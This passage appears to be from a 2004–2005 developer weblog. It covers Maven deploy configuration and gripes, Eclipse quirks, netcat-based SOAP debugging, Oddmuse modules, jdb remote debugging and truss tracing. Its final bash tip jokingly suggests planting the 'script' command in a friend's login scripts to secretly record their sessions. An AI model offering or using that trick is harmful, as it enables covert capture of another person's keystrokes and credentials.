  Unable to obtain goal [multiproject:deploy-callback] -- /home/the_user/.maven/cache/maven-artifact-plugin-1.4.1/plugin.jelly:94:13: <artifact:artifact-deploy> Unable to deploy to any repositories

Then my eye fell on the sftp line in the project.properties:

  maven.repo.R1=sftp://repository.the.company

Hmmm, in another project this said 'scp' instead of 'sftp'. So I reset it to scp... And beware, all was good again!

To reproduce:

  1. Install J2SDK 1.4.2 build 03
  2. Install Maven 1.0.2
  3. Set JAVA_HOME to that directory
  4. Update PATH variable to point to $JAVA_HOME/bin
  5. Create Maven project and use sftp in project.properties
  6. Type maven jar:deploy

I haven't tested whether it's important, but this is with OpenSSH_3.8.1p1.

2005-10-26

More Maven findings. I've said before that in my humble opinion, Maven is too much in a state of flux to start using it in projects. I think this shows itself when you encounter older Maven projects, especially on the subject of repositories.

Maven uses repositories, where jars are kept. Those jars can be your own or someone else's. There are two types of repositories, local and remote. Local means on your own disk. Remote means ibiblio and your organization's repository. When the documentation talks about central repositories, they mostly mean remote repositories.

You'll probably want to use goal "jar:deploy" to copy your jars, wars and ears (artifacts in Maven-speak) via scp or sftp to some central box, your own organization's remote repository. Update: sftp might not work for you, see 2005-11-04

These need to be defined in your project.properties, see the Maven documentation on internal repositories:

  maven.repo.list=myrepo
  maven.repo.myrepo=scp://repository.mycompany.com/
  maven.repo.myrepo.directory=/www/repository.mycompany.com/
  maven.repo.myrepo.username=${user.name}
  maven.repo.myrepo.privatekey=${user.home}/.ssh/id_dsa

This way, everyone can deploy using his own username. This has the following advantages:

  1. You don't need to set up a generic account with a shared password
  2. You can always trace back a release to a specific user, which is useful when there are problems and you know how the build was done

Of course, there's a catch. You have to force everyone to have the same key name, and some users called it id_rsa or privatekey or cheese_sandwich. Maven can't figure this out itself, just like standard ssh does. We're helping it: create a file in your home directory called build.properties and add the following line to it:

  maven.privatekey=/home/user/.ssh/myprivatekey

And edit the line in your project.properties to read:

  maven.repo.myrepo.privatekey=${maven.privatekey}

There are also the following properties, which are deprecated and shouldn't be used. I encountered them in an older project along with the above properties and it took me a while to find out they're documented in the Maven properties documentation:

  maven.repo.central=repository.mycompany.com
  maven.repo.central.directory=/www/repository.mycompany.com/

Note how the documentation above all the options says this stuff is deprecated, and then continues to say in the description for each option that it's deprecated and you should use deploymentAddress and deploymentDirectory in project.xml. Read on and shiver: those are deprecated as well. Deprecation upon deprecation, welcome to Maven!

Anyway, the myrepo directory should be published with an Apache or similar webserver, and the URL to reach that particular directory should be put in the remote repository properties

  maven.repo.remote=http://www.ibiblio.org/maven,
    http://repository.mycompany.com/maven

N.B. Don't confuse all this stuff with the elements <siteAddress> and <siteDirectory> in your project.xml, these are used by the goal "site:deploy".

2005-10-06

A colleague offered advice on setting up an Excel spreadsheet which is useful for managing features in a software development project, a.k.a. feature culling. This happens when you are planning for a new project, but you and/or management has to decide what goes in and what doesn't. Open the template and put all features in the feature column. Then play with inclusion of features for each version by entering or deleting the 1. You can immediately see the effect the feature has on the development time.

Here is the template: feature culling.xls

Joel Spolsky offers more insight into planning, with a few helpful Excel tips:

2005-09-26

Because of my recent wrestle with Maven, a friend pointed me to this entry in the Bileblog.

Hilarious quote:
First problem, I see maven crud splattered all over. My heart sinks as I see the 3 tongued kisses of death; maven.xml, project.xml, and project.properties. This cannot possibly go well.

2005-09-15

I'm currently wrestling with Maven and I have several gripes.

I'm using version 1.0.2. Before complaining that I should upgrade: the 1.0.2 version is considered stable, so is considered by the Maven team as suitable for a production environment.

On to my gripes:

  • Maven tries to set one standard directory structure. This goal is gradually reached with each version, which I can understand. However, why the hell isn't this made clear? Different directory structures are all over the place:
    • The structure you generate with maven appgen is different from what is documented on the website.
    • The website itself is inconsistent. Then ten-minute-test for Maven 1.0 specifies src/main/java and other random pages (this one for example) specify src/java
    • You're building a war, so you use the ten-minute-test directory structure. It all works, except your index.html and web.xml don't get included in the resulting jar. After an hour or two, you find the maven.war.src setting for your project.properties and you set it to ${basedir}/src/main/webapp
  • It's possible to do maven eclipse and generate a faulty .project and .classpath
  • Sometimes, <resource> sections don't get included when doing a maven eclipse (see below)
  • Why isn't documentation delivered along with the download? Now you don't know whether the website reflects 1.0.2, 1.1beta or 2.0 alpha.
  • If you're behind a proxy, you have to set that proxy in your project.properties otherwise maven can't reach ibiblio.org -- however, if you do a maven site:deploy, you have to switch it off again because you're deploying to an internal box; it doesn't know that this particular box is internal (this is more of a Java problem in that it doesn't have a good integration with how the underlying OS administrates proxies).

Be careful with multiproject, too:

  • Do you actually need it? Is it necessary that SubProject A and SubProject B use different versions of SharedSubProject C?
  • Say you increment the version of a subproject and you increment the version in the multiproject.xml. Build. Watch it fail. You should first build the subproject manually!
  • How are you going to manage those versions in CVS? Set up procedures for this. Maven does not magically help you with proper tagging and release procedures.
  • Multiproject and xdocs don't work intuitively; for instance the javadoc from the subprojects is not reachable from the main page when you provided your own navigation.xml
  • You can't do maven multiproject:eclipse or maven multiproject:idea
  • If I have a multiproject, why can't it figure out that the subprojects depend on each other? It's already specified in the project.properties of the main project. Yes, a colleague found out you can do pom.currentVersion, but Maven should be able to figure this out automatically.
  <dependency>
    <groupId>UberProject</groupId>
    <artifactId>UPNet</artifactId>
    <type>jar</type>
    <version>${pom.currentVersion}</version>
    <properties/>
 </dependency>
  • The same basically goes for multiproject and the eclipse goal: subprojects are included in the classpath as jars, but typically you work on both so you'll have to manually delete the jars from the classpath and add the projects
  • More of a gripe with Eclipse: multiprojects and Eclipse don't really match.

Conclusion

I've got most of it figured out, but I've wasted so much time that I could've written three complete Ant scripts by hand. So, it takes around three projects to get an increase in productivity by using Maven. In conclusion, I would advise other developers to stick with Ant and wait for this mess to be cleared up.

Plugin problem

Oh and if you have to upgrade a plugin because it has a bug, take the following steps to avoid this message:

  WARNING: Plugin 'maven-site-plugin' is already loaded from
  maven-site-plugin-1.6.1; attempting to load maven-site-plugin-1.5.2 
  • Remove the cache directory in ~/.maven
  • Copy the jar of the new plugin in your Maven its plugin directory
  • Remove (DON'T JUST RENAME) the old version of the plugin

We had to upgrade maven-site-plugin from 1.5.4 to 1.6.1 and I renamed the 1.5.4 jar to maven-site-plugin-1.5.4.jar.bak -- however by some crazy mechanism Maven downloads the old plugin into your cache again.

Eclipse filter and empty directories

There's a problem with Eclipse which isn't likely to show up except when you use CVS and Maven its Eclipse plugin.

Suppose you have a bunch of empty directories and when you check out with Eclipse, you filter them:

  • Going to the Package Navigator and pull open the menu
  • Select Filters
  • Choose "empty packages"

Also, you have a directory structure like this:

  myproject
  \--- src
       |--- main
       |    |--- java
       |    \--- resources
       \--- test
            |--- java
            \--- resources

You run maven eclipse to generate your classpath, which will now include main/java and main/resources. In main/resources, a bunch of properties files reside. You want to be able to see them. But you can't. Why not? Eclipse decided it's an empty package. Which it is....

What's conceptually wrong here is that Eclipse doesn't have a classpath setting, only a source path setting (configurable via menu Project, Properties, category Java Build Path, first tab Source). But it's not a source path, it's part of the classpath!

2005-08-26

Messing with SOAP? Using Axis? Need to debug it?

I assume you have a client and a server and want to see the exact output? Don't go through the mess of configuring the SOAPMonitor, this doesn't show you the exact in/output, which obviously is a problem. Instead use plain and trusted standard Unix tools.

To view client output:

  • Start netcat with "nc -l -p 8080". To save the output, append "|tee output"
  • Run your client, pointing to port 8080

To view server output:

  • Start your server, which listens to, say, port 8080
  • Send your saved output to the server, like this: "cat output | nc localhost 8080"

You could also use a traffic dump, but this is easier to read.

2005-08-06

A personal note: you have all probably heard or seen short newsblurbs on the heavy rain in India on the radio or TV. However, lots of us in the IT industry have friends and colleagues there. So in addition to the somewhat limited media coverage I'd like to point out some extra news sources to get a more complete picture. If you're on a tight schedule, use the first link to get a visual impression.

Finally, a friend in the area reported that Bangalore and Hyderabad (where the brunt of the IT industry is located) are fine currently.

I'm ending with a tip: if you want to keep track of a certain area, go to the Times of India, and click 'Cities' in the left navigation bar.

2005-06-28

And yet another Oddmuse module. This one provides an RSS syndication for those people who have Oddmuse installed, but can't or won't install the necessary Perl module XML::RSS. A sign of this missing module is that adding the RSS feed to an RSS reader will result in an error. Also, right-clicking and saving the RSS link will result in an empty file.

To install:

  1. Download the file simple rss.pl
  2. Upload it into your wiki its modules directory

To test, add the link to the RSS feed to your favorite reader.

2005-06-23

I've created another little Oddmuse module to display a Google Free Search or Adsense Search box on an Oddmuse wiki. I called this one google search.pl. The previous module, adsense.pl, displayed AdSense banners above pages.

Instead of (or in addition to) the usual search box, a Google search box can be put below every page. When an administrator is logged in and enters the Administration page, the normal Search & Replace boxes are shown.

To use this module on your Oddmuse wiki, take the following steps:

  1. Go to the Google Free Search page and copy the code, or alternatively, copy the AdSense Search code
  2. Create a new page called GoogleSearch and paste the code you just copied.
  3. Lock the page; this piece of code will be added on top of every page on your Wiki
  4. Download the google search.pl module and upload it into your modules directory
  5. Go to your wiki or reload the page if necessary, and voilà, the new search box is shown!

If you want to have the normal Oddmuse search box shown, edit the module and set the variable $showOddmuseSearch to 1.

2005-06-09

(English readers: this is a comparison between Dutch and US hosting companies offering Virtual Private Servers)

Ik heb een overzicht gemaakt van goedkope aanbieders van Linux VPSen (Virtual Private Servers). Ideaal voor techneuten die nu een eigen website hebben maar toch meer mogelijkheden zoeken, of voor webmasters met system administration ervaring. Er is een selectie gemaakt onder de vijftien euro.

2005-05-26

Adding search engines to Firefox is so easy that it's embarrassing. As noted before, I'm using Atlassian's Jira at work to track issues in the software and being able to search through them straight from the browser is pretty useful. To be able to do this yourself, create a file called jira.src in your firefox searchplugins directory with the following contents:

  <search
     name="Jira"
     description="Jira Search"
     method="GET"
     action="http://yourbox:port/secure/QuickSearch.jspa"
     queryEncoding="utf-8"
     queryCharset="utf-8"
  >
    <input name="searchString" user>
  </search>

To adapt the file to your situation:

  • Adjust the action, i.e. enter the correct hostname and port (if something else than the standard port 80)
  • Adjust the queryEncoding and queryCharset fields; linux boxes are usually set to utf-8, while Windows installations in the Western world use win-1252

To quickly search using the keyboard:

  1. Press CTRL-J or CTRL-K to go to the search box
  2. Pound CTRL-Down one or more times to select the Jira search option
  3. Type a few keywords and press Enter

If you put the Jira logo in the searchplugins directory, that'll be shown instead of the spyglass when picking your new Jira search plugin.

2005-04-25

I've created a five-line Oddmuse module to display Google Adsense. I called her adsense.pl.

All it does is placing a piece of Javascript on the top of each page when the user is browsing (but not when editing a page, when using the administration screens et cetera).

To use, take the following steps:

  1. Login to your Adsense account, and copy the JavaScript code that's generated
  2. Create a new page called 'adsense' and paste the JavaScript code
  3. Lock the page if necessary; this piece of JavaScript will be added on top of every page on your Wiki
  4. Download the adsense.pl module and upload it into your modules directory
  5. Reload your home page, and voilà, your ad is shown! You might want to add a <div> or a <p align="center"> around your ad code.

There is a TODO list for this module, some of which I've already implemented.

2005-04-24

Today, Slashdot linked to a slightly negative Forrester report on aspect-oriented programming (AOP). It was compared with the GOTO statement and other features that were deemed ugly. I haven't formed a firm opinion yet on AOP, but I do know that there are lots of things that are awkwardly expressed in an OO language such as Java. If AOP can make one more productive, then I'm inclined to just salute the effort.

True visionaries take a broader view: Jim Coplien wrote an article in 2001 on
symmetry and broken symmetry in programming languages. And in 2004, Victoria Livschitz gave her opinion on what she thought the next move in programming would be. Highly enlightening, especially in the recent AOP "debates"...

2005-04-15

I've put an article on RFID online. I wrote this late last year but it's in the picture again with the recent concerns on RFID privacy. It covers the basics, relates this to software development and the offerings that are sold, and looks a bit into the future.

2005-04-14

I regularly buy a new version of Codeweavers' CrossOver Office, which is a commercial version of Wine -- a package to run Windows software on Linux. All their code is open source, you basically pay for support and the fact that Wine is repackaged in a user friendly way, with an installer, help files, et cetera.

They have an online database where applications are rated for usage. Each application has one or more "advocates", who maintain the usability status for the app. I've become an "advocate" for Enterprise Architect, an excellent UML modelling package.

The short story is that EA runs pretty well on Linux. They even have a webpage dedicated to running their software using CrossOver, and gave an interview on this subject. I've had a crash once, and some widgets aren't drawn correctly, but for the rest it runs pretty well.

If you're still interested, regularly check the CrossOver Enterprise Architect compatibility database entry because I'm planning to keep it up-to-date with tips and tricks.

2005-04-09

(Normally entries are in English, but this is applicable to Dutch users only).

Om te oefenen voor het vaarbewijs, wordt het ANWB cursusboek Klein Vaarbewijs verkocht met een CD-ROM met een oefenprogramma dat gemaakt is door Promanent. Het oefenprogramma is een Windows applicatie. Echter, dit programma lijkt in eerste instantie niet te werken onder Linux met Crossover Office, een commerciële Wine versie. Van het hele venster is alleen een rechthoek in het midden zichtbaar, net alsof je door een brievenbus naar de applicatie kijkt. Door de volgende regels toe te voegen aan de file ~/.cxoffice/dotwine/config (of waar je Crossover Office ook hebt geïnstalleerd), wordt de gehele applicatie getoond in een nieuw, apart venster. De applicatie is dan prima te gebruiken.

  [AppDefaults\\winevdm.exe\\x11drv]
  "Desktop" = "800x600"

Alhoewel de executable eigenlijk VBEXAM03.EXE heet, dien je toch winevdm.exe te specificeren. winevdm.exe is de Wine manier om 16-bit applicaties te draaien. Het enige nadeel van deze oplossing is, dat andere 16-bit applicaties nu ook in een apart venster verschijnen, maar het is niet erg waarschijnlijk dat je meerdere van zulke applicaties hebt draaien.

2005-04-04

I did a small presentation on the subject of internationalization (zipped powerpoint). Definitions, Unicode, the ISO-8859 alphabet soup, the Windows encodings and more are touched upon. The presentation itself is light on details, but the comments tell you more. I plan on doing a second part in the future. Stay tuned.

After I did the presentation, a collegue pointed me to a recent java.net weblog entry: changes in the Unicode support in J2SE 1.5. Worth a read, whether you're a Java programmer or not.

2005-04-03

Today I put a small hack in the single script that's called Oddmuse, on which this site runs. It was one of my TODOs for some weeks.

  [bart@room wiki]$ diff wiki.cgi wiki_old.cgi
  454,456d453
  <   $text =~ s/\-\-\-/&#8211;/g;
  <   $text =~ s/\-\-/&#8212;/g;
  <   $text =~ s/\\\-/-/g;
  [bart@room wiki]$

A hyphen with a backslash in front of it becomes a hyphen. Two hyphens dashes become an em-dash. Three hyphens become an en-dash. All as per this article. And the best thing is, this was all done in under 15 minutes, including skimming the article and adding this weblog entry.

There are loads of typograhical things bothering me, one of them being the em- and en-dash--this is now fixed, however other things like curly quotes, ellipsis and ligatures are still missing. I'd like a nice fi and an ij, for starters. And I can't do it the way it's done above, you only want them outputted, not have your input changed.

Note that this stuff has all long been fixed using TeX and related and still we have to miss it on the Web and "professional" word processing packages which have reached version "XP" or "2.0" and still look not-so-good.

2005-03-22

When you have the time, look around at C2. It's one of the oldest wikis around. A vast collection of interesting stuff; for instance, the other day I looked around for implementations of access control lists (ACLs) and voilà, c2 delivers.

One of the people behind this wiki is Ward Cunningham. At Artima, Bill Venners did an interview with Ward Cunningham.

2005-03-21

Chet Haase blogs about how they are looking for Java applications which they want to improve on either the UI or the performance side:
http://weblogs.java.net/blog/chet/archive/2005/03/jdg_seeks_bad_c.html

It's Sun, so they probably don't want SWT applications, which leaves off Azureus. However, there must be other apps out there and I for one am going to look around. The deadline is March 31st.

You can also do this yourself, of course. Personally, I'm not very interested in the UI side, but more on the performance side. I'd say if you haven't ever used a profiler, pick an application which you think needs some performance improvement, download a profiler and run it on your application. One profiler I could recommend is JProfiler. It has a 14 day trial, but that's no problem since it passed my 15_minute_test with flying colors. I've also seen people put the built-in profiler of Eclipse put to good use.

2005-01-21

Outside work I received a question: "We need a WebDav implementation which is complete, has admin screens and is also reachable with FTP". Two solutions were found: heavily hacked Apache and Oracle IFS. The problem with the former is that you, well, need to hack. The problem is that for the latter, one would need an experienced DBA who can administer the midtier.

Then there's an additional thing that needs attention. If you want to customize IFS, you'll need to look into its API, the CM SDK (Content Management Software Development Kit). That API is basically split into two parts: one part for the quick-and-easy tasks of copying, deleting, moving, etc. and a second part which goes deeper and with which you can really modify the workings of IFS. It makes the API really baroque, but also really powerful. I've used the CM SDK, but only for quite simple tasks; reading, writing and deleting files and folders. Looking at the baroque API, a thing occurred to me: who'd need more? It's a filesystem in the database. You can completely modify it. Great, but you probably do not need this.

However, while you don't necessarily need the baroque part of the interface, it's there as well as its more simple counterpart. And besides that, the whole product is pretty unique. I don't know any other offering which has so many interfaces to file sharing mechanisms (FTP, WebDAV, NFS, SMB/CIFS, et cetera) and is combineable with your database-driven applications.

As with many things, there are both advantages and disadvantages and before choosing, it's a good thing to be knowledgeable on both.

2005-01-18

As an addition to the previous post, I'd like to add that issuetracking is of course just one facet of a whole project. Now, I'm not yet an expert on this, but Asa of Mozilla fame definitely is. Check this weblog entry for a highly interesting post on the subject: http://weblogs.mozillazine.org/asa/archives/007309.html

2005-01-17

Looking back, I miss a lot of things that should've been in the curriculum of my education. I've said something about reading source code, but what most computer science students also miss, is a feeling for the difficulty of managing software engineering of big projects. In my opinion, every student should have a look at the issue system of a big project. I had some irritations in using OpenOffice and decided to see what the problem was with the bug I was experiencing. Take a look at Tracking Issues.

2004-12-12

Reading source code is one of those things that I feel that nobody likes, while the advantages are so clear. You can brush up language skills, find out how other people solve things, learn different architectures, find out what the quality of a code base is, play spot-the-pattern et cetera. One cause could be that you don't learn reading other people's code in college. On the contrary, they want you to create little pieces of code that can easily be kept in one head and where correctness is easily demonstrated.

The real world doesn't work like that. If your day job isn't maintaining other people's code in the first place, then you'll get to see your colleague's code at the end of the project when they move on and you get to stay for a little while. Either way, you'll just have to accept that you don't understand everything and get on. For those people who still have that barrier, I did a little writing on how to search through code and getting it to work the way you want it, without feeling lost. We're going to look at Adjusting Starfighter.

2004-10-15

How to remotely debug using jdb

First compile your java code with the '-g' option. Deploy the compiled code to your server. Then start the virtual machine on the server with debugging parameters:

 -Xdebug -Xrunjdwp:transport=dt_socket,address=6000,server=y,suspend=n

Then either use JDeveloper or the standard (implementation reference) debugger from Sun, which is called 'jdb'. In the first case, go to Tools, Project Properties, flip open Debugger, click Remote and check Remote Debugging. Select 'Attach to JPDA' which means we attach to a Sun JVM. Then click OK and click the debug icon. Fill in the hostname and the address which you specified in the debugging parameters, for example 'oxdaps20a' and '6000'.

To debug with jdb, open a shell or DOS box and type:

  jdb -attach your.development.box:6000

On the jdb> prompt, type the line

  use /path/to/sourcefiles

to tell the debugger where it can find the source files. Set some breakpoints with the 'stop' command and then wait for the breakpoints to hit. Type 'list' to see where the flow of control is when a breakpoint was encountered. Type 'next' to go to the next line. Type 'step' to step into a method.

Note: when either debugger acts funny, i.e. breakpoints are set but never hit, breakpoints cannot be set, or the code stops in places where it shouldn't stop (empty lines, comments), chances are that the code that's running is different from what you are looking at. Compile and deploy your code again and start debugging again. When the JDeveloper debugger acts funny, use jdb instead. The JDeveloper debugger is more tuned to work with the Oracle JVM (OJVM), which coincidentally is now also available on Linux.

Note: when you debug a virtual machine, all threads halt, affecting other people's work. With jdb it's possible to let other threads continue, see also 'help thread'. With JDeveloper this is not possible (and I've heard that there aren't any other commercial debuggers that can do this either).

Note 2: if you want the virtual machine to wait while you remotely connect with the debugger, change the VM option 'suspend' to 'n'.

2004-09-02

You'd like a nice way to order the output of (Oracle) SQL in an arbitrary way? For instance, if you query a table with filenames and the customer first wants the files with extension xml, then pdf and finally raw, you could use a query like done below:

      select ast.filename,
             decode(ast.extension,
                    'pdf', 1,
                    'raw', 2,
                    0)                 sort_order
      from   assets                    ast
      order  by sort_order
      

The syntax for decode is a bit confusing. Basically, it's a bit like a Java switch statement. First, name the column whose value you want to substitute. Then, you get the original-new value pairs. The final parameter is for the case where none of the original values match.

2004-08-06

This is for unredeemed hackers who must see the raw bits to be happy.
-- Solaris truss man page

They say that automatic garbage collection is one of the advantages of Java. That doesn't quite get you off the hook completely. True, it saves you from having to delete each new object you create, as one would in C++. However, besides memory there are other resources that are scarce (diskspace, network, database) but those aren't cleaned up automatically as opposed to the objects that represent them. For instance, below is a routine which reads a textfile into a string:

    private String readFile(File file) throws IOException {
        BufferedReader in = null;
        try {
            String line = null;
            StringBuffer contents = new StringBuffer();
            in = new BufferedReader(new FileReader(file));
    
            while ((line = in.readLine()) != null) {
                contents = contents.append(line + "\n");
            }
            return contents.toString();
        } catch (Exception e) {
            return null;
        }
    }

Have you spotted the error? I was in a hurry when I coded this method and I certainly didn't. The error is that the reader needs to be closed:

        finally {
            if (in != null) {
                in.close();
            }
        }

This method isn't heavily used but when there is a maximum of 1024 open files and the application runs a few hours, you'll get messages in your logs stating that you opened Too many files. (By the way, the maximum can be found with ulimit -n if you're using the Bash shell). What is nasty, is that that message doesn't really tell you exactly where you open too many files. Rather than pouring over all that code, I used truss on the Solaris box (on Linux, it's called strace). This command can tell you which system calls an application makes.

System calls are basically the commands that you can give to the kernel. Your favourite programming language may have nice libraries or even have some drag-and-drop widgets, but it all comes down tot asking the kernel whether you can open that file. The kernel will then do the work of checking permissions, checking whether the file is actually there, returning an error if necessary, et cetera. An example of a system call is open, or fork, or something else.

As said before, truss and strace can tell us which system calls an application makes. I was interested in the open and close calls. After I had done a ps to find the process ID (pid) of the running app, I typed

    truss -t open,close -p 7601 -f > trussoutput.txt 2>&1

When the application had run for some time, I interrupted truss, opened it in vi and threw away all pairs of open and close calls. What remained, were the open calls that had no counterpart. Since the arguments to the system calls are also shown, the filename shows up. And that definitely rang a bell; I knew immediately which piece of code opened that file.

2004-07-31

I'm currently reading The Pragmatic Programmer and although it contains a lot of those things that are pretty much common sense, there are some true gems in there as well. Especially the part about tracer bullets.

The project I'm currently working on, consists of a number of workflows. One of the flows I'm working on, has to support different production stages; it goes too far to explain, but it's enough to say that there are multiple stages of which the first is the simplest.

Some of those workflows contained steps that were unexpectedly large and had changing requirements, meaning they were difficult to plan. Estimates would change all the time, causing some *cough* friction here and there.

As a remedy, we would first get the full flow working for the first production stage and when the flow ran flawless from start to end, we would build uit each step in the flow to support the next stage.

Hunt and Thomas (the Pragmatic Programmers) call this tracer bullets, which contain a phosphor payload that flashes when it hits the target. In the dark, the gunman then knows that his aim is right.

The idea is good, but it's immensely difficult to resist the temptation when you're frantically coding! Because you're in the Flow and when you've done one part of the functionality, you can see those methods and data structures dangling in front of you. However, you still should break out of the flow at the correct time, synchronize with your team members and the QA people, and get that workflow to, well, flow.

It's amazing what this does to management, the customer and the developer. When the flow works partly, it gives a feeling of confidence to all the parties. This is definitely a good thing.

2004-07-13

Some cool bash/Linux stuff:

If you're using bash, put a line TMOUT=600 in /root/.bashrc. The user will automatically logout after 10 minutes.

If you're often cd'ing into a mounted directory, this might mean a lot of typing. For instance, at a client I always have to change to directory /mnt/es-groups/EWII for the project files. To shorten typing, I created the following line in my .bash_profile file:

export CDPATH=".:/mnt/es-groups/EWII"

When you type cd Documents, you'll find yourself immediately in the project's documentation directory; bash even tab-completes.

UNIX Commands No One Ever Heard Of ™...: Type script and press enter. A new shell will be started. Now do whatever you like. When you're done, press CTRL-D on an empty prompt. script will reply with something like Script done, file is typescript. The new file will contain whatever you've typed, including screen output! Fun to put in your friend his/her login scripts....